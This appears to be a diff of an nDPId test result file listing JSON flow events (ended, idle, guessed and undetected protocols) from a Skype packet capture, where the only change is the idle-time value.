+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713814,"flow_last_seen":1431969726846,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 